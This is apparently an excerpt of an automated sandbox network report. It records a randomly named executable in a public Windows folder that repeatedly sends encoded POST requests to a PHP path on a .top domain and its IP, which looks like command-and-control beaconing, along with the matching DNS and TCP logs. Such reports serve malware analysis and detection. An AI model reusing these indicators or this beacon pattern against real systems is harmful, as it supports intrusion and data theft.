Dec 22, 2024 15:44:43.669796944 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:43.669979095 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:43.789676905 CET	80	49931	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:44.018359900 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:44.138097048 CET	80	49931	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:44.941432953 CET	80	49931	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:44.986969948 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:45.176815033 CET	80	49931	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:45.221345901 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:45.261913061 CET	49931	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:52.354051113 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:52.473644018 CET	80	49953	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:52.473762989 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:52.473998070 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:52.593589067 CET	80	49953	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:52.830962896 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:52.950587034 CET	80	49953	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:53.744899035 CET	80	49953	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:53.799560070 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:53.979979992 CET	80	49953	37.44.238.250	192.168.2.4
Dec 22, 2024 15:44:54.033936977 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:44:54.053802967 CET	49953	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:01.172427893 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:01.292412043 CET	80	49975	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:01.292501926 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:01.292690039 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:01.413024902 CET	80	49975	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:01.643543959 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:01.763746023 CET	80	49975	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:02.564275980 CET	80	49975	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:02.612149000 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:02.800220013 CET	80	49975	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:02.846530914 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:02.871889114 CET	49975	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:09.915349960 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:10.035094976 CET	80	49995	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:10.035183907 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:10.035439968 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:10.155324936 CET	80	49995	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:10.393688917 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:10.514183044 CET	80	49995	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:11.306257963 CET	80	49995	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:11.346640110 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:11.540150881 CET	80	49995	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:11.581006050 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:11.614960909 CET	49995	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:23.535960913 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:23.656373024 CET	80	50017	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:23.656456947 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:23.656759977 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:23.776494026 CET	80	50017	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:24.003226995 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:24.123481035 CET	80	50017	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:24.927016973 CET	80	50017	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:24.971786976 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:25.160655022 CET	80	50017	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:25.206202984 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:25.267782927 CET	50017	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:32.782753944 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:32.905299902 CET	80	50018	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:32.905395031 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:32.905682087 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:33.025270939 CET	80	50018	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:33.253392935 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:33.373178005 CET	80	50018	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:34.177478075 CET	80	50018	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:34.224016905 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:34.412735939 CET	80	50018	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:34.456280947 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:34.492799044 CET	50018	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:41.542064905 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:41.662115097 CET	80	50019	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:41.662216902 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:41.662519932 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:41.782118082 CET	80	50019	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:42.019006968 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:42.138660908 CET	80	50019	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:42.935374022 CET	80	50019	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:42.987607002 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:43.172420025 CET	80	50019	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:43.222019911 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:43.246638060 CET	50019	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:50.887470961 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:51.007005930 CET	80	50020	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:51.007086039 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:51.007438898 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:51.127034903 CET	80	50020	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:51.363115072 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:51.482845068 CET	80	50020	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:52.278011084 CET	80	50020	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:52.331454039 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:52.512696028 CET	80	50020	37.44.238.250	192.168.2.4
Dec 22, 2024 15:45:52.565849066 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:45:52.603326082 CET	50020	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:04.281343937 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:04.402106047 CET	80	50021	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:04.402254105 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:04.402642965 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:04.522288084 CET	80	50021	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:04.753720045 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:04.873564005 CET	80	50021	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:05.676282883 CET	80	50021	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:05.722259045 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:05.912935972 CET	80	50021	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:05.956623077 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:05.993031025 CET	50021	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:18.047597885 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:18.167522907 CET	80	50022	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:18.167630911 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:18.167835951 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:18.287426949 CET	80	50022	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:18.520056009 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:18.639755011 CET	80	50022	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:19.441596985 CET	80	50022	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:19.488096952 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:19.680744886 CET	80	50022	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:19.722409010 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:19.751331091 CET	50022	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:30.915235043 CET	50023	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:31.035840034 CET	80	50023	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:31.035933018 CET	50023	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:31.036214113 CET	50023	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:31.155962944 CET	80	50023	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:31.394531012 CET	50023	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:31.514415979 CET	80	50023	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:32.306847095 CET	80	50023	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:32.347521067 CET	50023	80	192.168.2.4	37.44.238.250
Dec 22, 2024 15:46:32.546170950 CET	80	50023	37.44.238.250	192.168.2.4
Dec 22, 2024 15:46:32.597501040 CET	50023	80	192.168.2.4	37.44.238.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 22, 2024 15:42:37.187335968 CET	53624	53	192.168.2.4	1.1.1.1
Dec 22, 2024 15:42:37.500390053 CET	53	53624	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 22, 2024 15:42:37.187335968 CET	192.168.2.4	1.1.1.1	0x8c62	Standard query (0)	228472cm.n9shka.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 22, 2024 15:42:37.500390053 CET	1.1.1.1	192.168.2.4	0x8c62	No error (0)	228472cm.n9shka.top		37.44.238.250	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

228472cm.n9shka.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	37.44.238.250	80	5700	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:42:37.625878096 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 228472cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:42:37.972191095 CET	336	OUT	Data Raw: 00 0b 04 03 06 0d 01 00 05 06 02 01 02 05 01 0b 00 06 05 01 02 07 03 0b 02 53 0d 01 03 02 03 07 0e 04 05 0f 00 07 05 0a 0b 00 05 01 04 05 05 06 06 54 0d 08 0c 0e 07 52 04 04 03 02 04 0a 07 5b 02 0a 0e 59 07 0f 04 02 0b 0f 0f 01 0a 05 0d 09 06 05 Data Ascii: STR[YV\L~Ckc}[cbz\vfphliBcUpMMhoBU{Nf}m]Twtl~u~V@{m\L}Oy
Dec 22, 2024 15:42:38.897340059 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:42:39.131508112 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:42:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	37.44.238.250	80	7128	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:42:52.223566055 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:42:52.580316067 CET	344	OUT	Data Raw: 00 06 01 07 03 0b 01 0b 05 06 02 01 02 0d 01 05 00 02 05 0e 02 03 03 00 02 53 0a 00 05 0f 02 07 0d 51 05 0e 03 02 07 01 0e 04 05 54 00 06 06 0f 06 54 0c 09 0d 55 06 56 06 54 04 03 06 55 04 0a 00 03 0c 0e 07 0e 06 01 0d 0f 0e 54 0d 00 0d 05 02 0d Data Ascii: SQTTUVTUTPQ\L~~pi_w\yBvu{UBjXtU\|hM{Xll^[{`XKh~`wIhLi_~V@{Sr~LW
Dec 22, 2024 15:42:53.494348049 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:42:53.731715918 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:42:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	37.44.238.250	80	5052	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:43:06.874429941 CET	348	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 228472cm.n9shka.top Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:43:07.220925093 CET	336	OUT	Data Raw: 00 06 04 03 06 08 01 02 05 06 02 01 02 05 01 01 00 0b 05 0e 02 04 03 0a 00 03 0d 0c 07 03 01 00 0e 03 05 0b 01 00 04 0b 0e 51 02 04 07 05 06 06 07 04 0f 0f 0e 05 04 07 07 02 06 06 05 04 05 0c 02 50 0d 0f 07 01 05 01 0d 06 0b 0e 0e 03 0b 08 04 05 Data Ascii: QPT]WPP\L~@sfc\aOaeoU\|Bytow^\|]c[xBtYoYu_kS`cw^A~e~V@Az}nA}_y
Dec 22, 2024 15:43:08.144661903 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:43:08.379590988 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:43:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	37.44.238.250	80	6776	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:43:21.484421968 CET	301	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:43:21.830423117 CET	344	OUT	Data Raw: 05 05 04 04 06 01 01 06 05 06 02 01 02 03 01 03 00 0a 05 01 02 02 03 01 02 03 0f 00 04 0f 06 06 0f 0f 06 5a 01 02 05 03 0c 50 05 01 06 0a 05 55 07 05 0e 0d 0d 54 06 06 01 00 03 05 01 0b 05 0a 02 51 0c 00 00 02 04 09 0c 57 0f 02 0e 00 0f 04 05 51 Data Ascii: ZPUTQWQPRVTV\L~@\|Nfvqv\afphBWBtU`kcc_{\|Kx`jh}UR`YhNiO~V@x}\~\[
Dec 22, 2024 15:43:22.755959988 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:43:22.996818066 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:43:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49763	37.44.238.250	80	2000	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:43:32.728122950 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:43:33.080248117 CET	344	OUT	Data Raw: 00 07 01 07 06 09 01 02 05 06 02 01 02 01 01 06 00 00 05 00 02 07 03 0f 02 04 0f 57 06 50 02 05 0c 02 03 0e 00 03 03 00 0d 06 06 03 00 03 07 0f 03 0a 0d 00 0a 0e 01 0a 05 0e 06 01 05 02 05 0b 01 03 0e 59 07 00 04 04 0b 07 0e 57 0c 54 0f 01 02 03 Data Ascii: WPYWTQ\L}PcvwrmLvKkPkUz\tR]^kZhJycHz`v}m\|@`^t}u~V@{mz}LS
Dec 22, 2024 15:43:34.008217096 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:43:34.247536898 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:43:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49790	37.44.238.250	80	6880	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:43:43.723961115 CET	366	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:43:44.080337048 CET	344	OUT	Data Raw: 00 03 01 07 03 0c 01 06 05 06 02 01 02 02 01 0a 00 05 05 00 02 01 03 01 02 56 0d 02 06 03 03 52 0d 54 06 0a 00 53 05 07 0c 53 05 57 07 06 02 03 04 07 0c 09 0d 04 04 55 04 55 07 03 05 06 04 0d 00 04 0c 01 06 56 01 08 0b 06 0c 50 0f 01 0c 04 04 02 Data Ascii: VRTSSWUUVPT\L~kcfNwrn^uuoUojX`Uo^k]RoRlN}^Spt^s_je~V@zmn~b[
Dec 22, 2024 15:43:44.997910976 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:43:45.232017040 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:43:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49825	37.44.238.250	80	504	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:43:58.385649920 CET	313	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
